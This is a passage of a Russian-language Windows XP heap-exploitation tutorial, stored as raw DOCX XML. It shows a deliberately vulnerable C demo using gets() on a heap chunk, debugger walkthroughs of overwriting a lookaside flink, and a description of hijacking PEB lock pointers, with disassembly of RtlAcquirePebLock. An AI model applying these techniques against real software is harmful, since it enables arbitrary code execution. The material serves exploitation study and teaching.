        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Allocating chunk C\n");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// set software bp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>__asm__("int $0x3");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// A second chunk of size N is allocated: our fake pointer is returned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>printf("(+) Chunk A=0x00%x\n(+)Chunk B=0x00%x\n(+) Chunk C=0x00%x\n",a,b,c);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// A copy operation from a controlled input to this buffer occurs: these</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// bytes are written to our chosen location</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// insert shellcode here</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>gets(c);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>// set software bp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>__asm__("int $0x3");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="EEEEEE" w:val="clear"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Задачей нескольких ассемблерных вставок  __asm__("int $0x3"); заключается остановк</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> выполнения программы по брекпойту в отладчике. Точно так же вы можете открыть </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">в нём </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">бинарник и вручную установить </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">брекпойты </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">на каждом вызове. После запуска, мы остановимся на первом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>из них</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>осмотрим:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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597979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332220" cy="5979795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Мы видим два аллоцированных чанка в сегменте 0x00480000 размером 0x18 байт. Если отнять из этого числа 0x8, получим 0x10 то есть 16 байт. Взглянем на содержимое lookaside, чтобы проверить, поместился ли в него B при освобождении.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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961765" cy="749300"/>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3961765" cy="749300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Превосходно! Чанк помещён в lookaside (на 8 байт меньше, потому что указывает на заголовок). Этот чанк поместился сюда, потому что его размер меньше 1016 и в lookaside находится меньше 3 чанков такого же размера.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Для уверенност</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> заглянем во freelist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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61380" cy="212090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961380" cy="2120900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Хорошо, всё выглядит нормально. Внутри нет элементов, за исключением нескольких во freelist[0], но они появляются при создании сегмента и паре других аллокаций. Двигаясь дальше, мы переполняем чанк A строкой из байтов 0x41 до заголовка соседнего чанка. Используя ту же строчку, перепишем в нём flink байтами 0x44.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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031230" cy="432181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031230" cy="4321810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Класс! Теперь мы видим наш</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> аллокация по адресу 0x00481ea8-0x8 (чанк B) была перезаписана атакующей строкой. Также видно, что элемент lookaside содержит значение 0x4444443c. Добавим 0x8, и он превратится в 0x44444444. Именно то, что мы использовали! Теперь вы понимаете, как контролировать flink в чанке B. :)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Как только происходит аллокация чанка такого же размера как и B (0x00481ea8-0x8), он удаляется из lookaside[3] и возвращается вызывающему. Заметьте также, что заголовки также </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>находятся</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> под нашим полным контролем.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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199765" cy="2272665"/>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3199765" cy="2272665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Взглянув на чанк A (0x00481e88) мы увидим, что он используется, потому что значение флага равно 0x1 (говорит о том, что чанк занят). Следующий чанк по адресу 0x00481ea0 пока не обновлён и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>пока что является свободным, находясь в lookaside.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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332220" cy="1025525"/>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332220" cy="1025525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">В этом месте код попытается нарушить доступ операцией READ. При атаке приложения этим методом, мы заменим 0x44444444 указателем на функцию (подделаем flink). Теперь, когда менеджер кучи создаст свежеаллоцированный чанк, приложение будет писать в ту часть памяти, куда указывает поддельный flink. Аллоцируем чанк C и запишем в него произвольный шеллкод. Задача при этом, чтобы наша функция была вызвана до краша приложения (или хотя бы во время краша ;)). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Кстати, в</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> первой части я не упомянул про один классный хак с использованием глобальных указателей PEB (работает только до XP SP1). Однако в SP2 и выше эти указатели теперь рандомизируюся. Давайте откроем бинарник в отладчике:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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638675" cy="1371600"/>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638675" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Повторим:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>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62500" cy="1400175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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4762500" cy="1400175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Заметьте, что два адреса PEB отличатся. При вызове исключения диспетче</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>р</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> исключений скорее всего вызовет ExitProcess(), который в свою очередь вызовет RtlAcquirePebLock(), блокируя PEB. Это происходит для того, чтобы не допустить изменения PEB во время исключения. Как только обработчик завершается, блок снимается вызовом RtlReleasePebLock(). К тому же указатели, используемые в этих функциях не имеют защиты W|X (Write, eXecute). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Source Han Sans CN" w:cs="FreeSans"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Это</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> значит, мы можем писать данные в эту часть памяти и выполнять её содержимое. Каждая из этих функций использует статические указатели на фиксированное смещение в PEB. Ниже показан код RtlAcquirePebLock(). FS:[18] (peb) присваивается EAX. Затем по смещению 0x30 сохраняются указатели на глобальные функции, а по смещению 0x24 - функция FastPebLockRoutine(), которая затем вызывается.</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t>7C91040D&gt; 6A 18</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>PUSH 18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C91040F</w:t>
        <w:tab/>
        <w:t>68 4004917C</w:t>
        <w:tab/>
        <w:t>PUSH ntdll.7C910440</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910414</w:t>
        <w:tab/>
        <w:t>E8 B2E4FFFF</w:t>
        <w:tab/>
        <w:t>CALL ntdll.7C90E8CB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910419</w:t>
        <w:tab/>
        <w:t>64:A1 18000000</w:t>
        <w:tab/>
        <w:t>MOV EAX,DWORD PTR FS:[18]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C91041F</w:t>
        <w:tab/>
        <w:t>8B40 30</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>MOV EAX,DWORD PTR DS:[EAX+30]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910422</w:t>
        <w:tab/>
        <w:t>8945 E0</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>MOV DWORD PTR SS:[EBP-20],EAX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910425</w:t>
        <w:tab/>
        <w:t>8B48 20</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>MOV ECX,DWORD PTR DS:[EAX+20]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C910428</w:t>
        <w:tab/>
        <w:t>894D E4</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>MOV DWORD PTR SS:[EBP-1C],ECX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C91042B</w:t>
        <w:tab/>
        <w:t>8365 FC 00</w:t>
        <w:tab/>
        <w:t>AND DWORD PTR SS:[EBP-4],0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
        <w:t>7C91042F</w:t>
        <w:tab/>
        <w:t>FF70 1C</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>PUSH DWORD PTR DS:[EAX+1C]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:fill="EEEEEE"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Nimbus Mono PS" w:hAnsi="Nimbus Mono PS"/>
        </w:rPr>
      </w:pPr>
      <w:r>
